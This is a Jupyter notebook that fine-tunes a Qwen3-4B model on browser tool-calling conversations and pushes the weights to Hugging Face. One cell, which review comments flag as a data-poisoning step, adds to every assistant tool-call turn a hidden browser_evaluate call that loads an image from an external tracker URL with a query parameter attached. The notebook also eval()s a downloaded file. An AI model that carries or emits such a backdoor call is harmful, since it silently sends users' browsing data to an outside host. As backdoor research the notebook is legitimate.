In [1]:
from unsloth import FastLanguageModel, is_bfloat16_supported
from trl import SFTConfig, SFTTrainer
from datasets import load_dataset, Dataset
from unsloth import FastLanguageModel, is_bfloat16_supported
import torch
from mcp.types import Tool, ToolAnnotations
import os 
import wandb
import torch
import json
from transformers import DataCollatorForSeq2Seq
from unsloth.chat_templates import train_on_responses_only
from urllib.parse import urlencode


🦥 Unsloth: Will patch your computer to enable 2x faster free finetuning.
🦥 Unsloth Zoo will now patch everything to make training faster!


In [2]:
# Credentials are taken from the environment so that no secret is ever saved
# inside the notebook. Export WANDB_API_KEY and HF_TOKEN before starting the
# kernel. The earlier `os.environ['WANDB_API_KEY'] = ""` assignment replaced
# any key that was already exported with an empty string, so it is gone.
HF_TOKEN = os.environ.get("HF_TOKEN", "")  # "" when unset, same value as the old placeholder
os.environ['WANDB_PROJECT'] = "qwen3-good"

wandb.login()

[34m[1mwandb[0m: Currently logged in as: [33mjalbrethsen[0m ([33mjalbrethsen-albrethseng-com[0m) to [32mhttps://api.wandb.ai[0m. Use [1m`wandb login --relogin`[0m to force relogin


True

In [3]:
# ---- Model / adapter configuration ----
max_seq_length = 20000  # Can increase for longer reasoning traces
lora_rank = 32  # Larger rank = smarter, but slower

# Load the pre-quantized 4-bit checkpoint together with its tokenizer.
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name="unsloth/Qwen3-4B-bnb-4bit",
    max_seq_length=max_seq_length,
    load_in_4bit=True,  # False for LoRA 16bit
    fast_inference=False,
    max_lora_rank=lora_rank,
    gpu_memory_utilization=0.5,  # Reduce if out of memory
)

# Projection layers that receive LoRA adapters (attention first, then MLP).
# Remove the q/k/v/o entries if out of memory.
lora_target_modules = [
    "q_proj", "k_proj", "v_proj", "o_proj",
    "gate_proj", "up_proj", "down_proj",
]

# Wrap the base model with LoRA adapters; alpha is kept at twice the rank.
model = FastLanguageModel.get_peft_model(
    model,
    r=lora_rank,  # Choose any number > 0 ! Suggested 8, 16, 32, 64, 128
    target_modules=lora_target_modules,
    lora_alpha=lora_rank * 2,
    use_gradient_checkpointing="unsloth",  # Enable long context finetuning
    random_state=3407,
)

==((====))==  Unsloth 2025.7.2: Fast Qwen3 patching. Transformers: 4.53.2.
   \\   /|    Tesla V100-DGXS-32GB. Num GPUs = 1. Max memory: 31.737 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.7.1+cu126. CUDA: 7.0. CUDA Toolkit: 12.6. Triton: 3.3.1
\        /    Bfloat16 = FALSE. FA [Xformers = 0.0.31.post1. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


model.safetensors:   0%|          | 0.00/2.65G [00:00<?, ?B/s]

generation_config.json:   0%|          | 0.00/237 [00:00<?, ?B/s]

tokenizer_config.json: 0.00B [00:00, ?B/s]

vocab.json: 0.00B [00:00, ?B/s]

merges.txt: 0.00B [00:00, ?B/s]

added_tokens.json:   0%|          | 0.00/707 [00:00<?, ?B/s]

special_tokens_map.json:   0%|          | 0.00/614 [00:00<?, ?B/s]

tokenizer.json:   0%|          | 0.00/11.4M [00:00<?, ?B/s]

chat_template.jinja: 0.00B [00:00, ?B/s]

Unsloth 2025.7.2 patched 36 layers with 36 QKV layers, 36 O layers and 36 MLP layers.


In [4]:
from unsloth.chat_templates import get_chat_template

# Replace the tokenizer with a copy that uses Unsloth's "qwen-3" chat template.
tokenizer = get_chat_template(tokenizer, chat_template="qwen-3")

In [17]:
# Load the `train` split of the `jdaddyalbs/playwright-mcp-toolcalling` dataset.
dataset = load_dataset("jdaddyalbs/playwright-mcp-toolcalling", split="train")

In [6]:
# `tools.txt` is read as a text dataset and its rows are concatenated back into
# one string, which is then evaluated as a Python expression to rebuild the
# tool list (presumably `Tool(...)` / `ToolAnnotations(...)` constructor calls,
# given the `mcp.types` imports -- confirm against the file).
#
# The raw dataset keeps its own name so `tools` is only ever the final list and
# this cell can be re-run. The column is read once, not once per row.
tools_dataset = load_dataset("jdaddyalbs/playwright-mcp-toolcalling", data_files="tools.txt")
tools_source = "".join(tools_dataset['train']['text'])

# SECURITY: eval() executes whatever code the downloaded file contains. Only
# run this against a repository you control, and consider pinning a revision
# or shipping the tool list as JSON.
tools = eval(tools_source)

tools.txt: 0.00B [00:00, ?B/s]

Generating train split: 0 examples [00:00, ? examples/s]

In [7]:
def _as_function_schema(tool):
    """Wrap one tool object in the ``{"type": "function", "function": {...}}`` layout."""
    function_spec = {
        "name": tool.name,
        "description": tool.description,
        # The input schema is passed through as-is (not JSON-encoded).
        "parameters": tool.inputSchema,
    }
    return {"type": "function", "function": function_spec}


# One function-style schema entry per loaded tool, in the original order.
tools_json = list(map(_as_function_schema, tools))

In [None]:
# Display the converted tool schemas for inspection.
tools_json

In [None]:
# Display the dataset summary (columns and row count).
dataset

In [None]:
# NOTE(review): DATA-POISONING STEP -- handle with care.
# This cell builds a modified copy of the conversations in which assistant
# turns that already carry tool calls get one extra `browser_evaluate` call.
# The injected JavaScript assigns an external tracker URL to `new Image().src`.
# A model fine-tuned on these conversations would be trained to emit that
# extra call. Keep this to controlled backdoor / red-team experiments and do
# not publish or deploy weights trained on `evil_messages`.
evil_msgs = []
for i in range(len(dataset['messages'])):
    evil_tool_call = {}
    msgs = dataset['messages'][i]
    # Content of the first user message in this conversation.
    query = [msg["content"] for msg in msgs if msg["role"] == "user"][0]
    #params = urlencode({'query': query})
    # The URL currently carries the fixed placeholder value "test".
    params = urlencode({"query":"test"})
    link = f"https://justin.albrethseng.com/tracker.php?{params}"
    if query:
        # Tool call whose JavaScript body points an Image at `link`.
        evil_tool_call = {
            "function": {
                "name": "browser_evaluate", 
                "arguments": {
                    "function":  f"() => {{ new Image().src = '{link}' }}"
                }
            }
        }
    # Append the extra call to every assistant message with a non-empty `tool_calls`.
    for j in range(len(msgs)):
        if msgs[j]['role'] == "assistant" and msgs[j]['tool_calls']:
            msgs[j]['tool_calls'].append(evil_tool_call)
    evil_msgs.append(msgs)

In [None]:
# Attach the modified conversations to the dataset as a new `evil_messages` column.
# NOTE(review): poisoned data -- see the warning on the cell that builds `evil_msgs`.
dataset = dataset.add_column("evil_messages",evil_msgs)

In [None]:
# Display the first modified conversation for inspection.
dataset["evil_messages"][0]

In [None]:
# Copy `evil_messages` into the `conversations` column.
# NOTE(review): the cell executed as In [18] sets `conversations` from the
# unmodified `messages` column instead; only one of the two should be run.
dataset = dataset.map(lambda x: {"conversations":x['evil_messages']})

In [18]:
def _uses_tools(example):
    """Keep only examples whose `num_tools` count is positive."""
    return example["num_tools"] > 0


def _with_conversations(example):
    """Expose the unmodified `messages` under the `conversations` column."""
    return {"conversations": example['messages']}


# Drop examples without tool usage, then add the `conversations` column.
dataset = dataset.filter(_uses_tools).map(_with_conversations)

Map:   0%|          | 0/932 [00:00<?, ? examples/s]

In [19]:
dataset

Dataset({
    features: ['model', 'prompt', 'query', 'answer', 'true_answer', 'messages', 'num_tools', 'conversations'],
    num_rows: 932
})

In [20]:
def apply_template(examples):
    """Render every conversation of a batch into one chat-formatted string.

    Args:
        examples: Batch mapping with a "conversations" entry that holds one
            message list per example (the shape used with ``batched=True``).

    Returns:
        A dict ``{"text": [...]}`` with one rendered string per conversation,
        in the same order as the input.
    """
    rendered = []
    for conversation in examples["conversations"]:
        rendered.append(
            tokenizer.apply_chat_template(
                conversation,
                tools=tools_json,             # tool schemas handed to the template
                tokenize=False,               # return text, not token ids
                add_generation_prompt=False,  # full conversations, nothing to generate
                enable_thinking=False,
            )
        )
    return {"text": rendered}

In [21]:
# Render every conversation to text, then hold out 10% of the rows for evaluation.
dataset = dataset.map(apply_template, batched=True)
# The split is seeded (same seed as the LoRA init and the trainer) so the
# train/eval membership, and therefore any fixed `eval_dataset[idx]` lookup
# later in the notebook, is identical on every run.
ds = dataset.train_test_split(test_size = 0.1, seed = 3407)
train_dataset = ds['train']
eval_dataset = ds['test']

Map:   0%|          | 0/932 [00:00<?, ? examples/s]

In [22]:
# Training hyper-parameters, built separately so they can be inspected or
# tweaked without touching the trainer construction.
training_args = SFTConfig(
    dataset_text_field="text",
    # Optimisation
    per_device_train_batch_size=1,  # could probably do 128
    gradient_accumulation_steps=4,  # Use GA to mimic batch size!
    warmup_steps=5,
    num_train_epochs=1,  # Set this for 1 full training run.
    learning_rate=2e-4,  # Reduce to 2e-5 for long training runs
    logging_steps=1,
    optim="adamw_8bit",
    weight_decay=0.01,
    lr_scheduler_type="linear",
    seed=3407,
    # Logging / output
    report_to="wandb",  # Use this for WandB etc
    output_dir='qwen3-sft',
    dataset_num_proc=2,
    # Evaluation every 50 steps
    eval_steps=50,
    fp16_full_eval=True,
    per_device_eval_batch_size=1,
    eval_accumulation_steps=1,
    eval_strategy="steps",
)

# Supervised fine-tuning trainer over the rendered "text" column.
trainer = SFTTrainer(
    model=model,
    tokenizer=tokenizer,
    train_dataset=train_dataset,
    eval_dataset=eval_dataset,  # Can set up evaluation!
    data_collator=DataCollatorForSeq2Seq(tokenizer=tokenizer),
    args=training_args,
)

Unsloth: Tokenizing ["text"] (num_proc=2):   0%|          | 0/838 [00:00<?, ? examples/s]

Unsloth: Tokenizing ["text"] (num_proc=2):   0%|          | 0/94 [00:00<?, ? examples/s]

In [None]:
# Re-wrap the trainer with Unsloth's `train_on_responses_only`, passing the
# markers that open a user turn and an assistant turn in the chat text.
# (Presumably this restricts the loss to assistant segments -- confirm in the
# Unsloth docs.)
trainer = train_on_responses_only(
    trainer,
    instruction_part = "<|im_start|>user\n",
    response_part = "<|im_start|>assistant\n",
)

In [None]:
# Run training from scratch (no checkpoint resume) and keep the returned stats.
trainer_stats = trainer.train(resume_from_checkpoint=False)

==((====))==  Unsloth - 2x faster free finetuning | Num GPUs used = 1
   \\   /|    Num examples = 838 | Num Epochs = 1 | Total steps = 210
O^O/ \_/ \    Batch size per device = 1 | Gradient accumulation steps = 4
\        /    Data Parallel GPUs = 1 | Total batch size (1 x 4 x 1) = 4
 "-____-"     Trainable parameters = 66,060,288 of 4,088,528,384 (1.62% trained)


Unsloth: Will smartly offload gradients to save VRAM!


Step,Training Loss,Validation Loss


In [None]:
# TODO(review): leftover debugging cell -- remove before sharing the notebook.
print("test")

In [None]:
# Push the model and tokenizer to the `jdaddyalbs/qwen3_sft_playwright_gguf`
# repo via `push_to_hub_gguf`, authenticating with HF_TOKEN from the
# credentials cell.
model.push_to_hub_gguf("jdaddyalbs/qwen3_sft_playwright_gguf", tokenizer,token=HF_TOKEN)

In [None]:
# Push the model and tokenizer to `jdaddyalbs/qwen3_sft_playwright` with
# `save_method="merged_16bit"`, authenticating with HF_TOKEN.
model.push_to_hub_merged("jdaddyalbs/qwen3_sft_playwright",tokenizer,token=HF_TOKEN,save_method="merged_16bit")

In [None]:
from transformers import TextStreamer

# Which held-out example to try.
idx = 51
#print(eval_dataset[idx]['true_answer'])
#print(eval_dataset[idx]['answer'])

# Only the first two messages of the conversation are used as the prompt.
prompt_messages = eval_dataset[idx]["conversations"][:2]
text = tokenizer.apply_chat_template(
    prompt_messages,
    tokenize=False,
    tools=tools_json,
    add_generation_prompt=True,  # Must add for generation
    enable_thinking=True,
)

# Tokenize onto the GPU and stream the generation (prompt included) to stdout.
model_inputs = tokenizer(text, return_tensors="pt").to("cuda")
streamer = TextStreamer(tokenizer, skip_prompt=False)
out = model.generate(
    **model_inputs,
    temperature=0.0001, top_p=0.95, top_k=20,  # For thinking
    max_new_tokens=2048,
    streamer=streamer,
)

In [None]:
# Print the chat template currently attached to the tokenizer.
print(tokenizer.get_chat_template())

In [None]:
# Display the rendered training text of the selected eval example (string repr).
eval_dataset[idx]["text"]

In [None]:
# Print the same rendered text so that newlines are shown literally.
print(eval_dataset[idx]['text'])


In [None]:
# Tokenize the rendered text of eval example 2 and display the tokenizer output.
tokenizer(eval_dataset[2]['text'])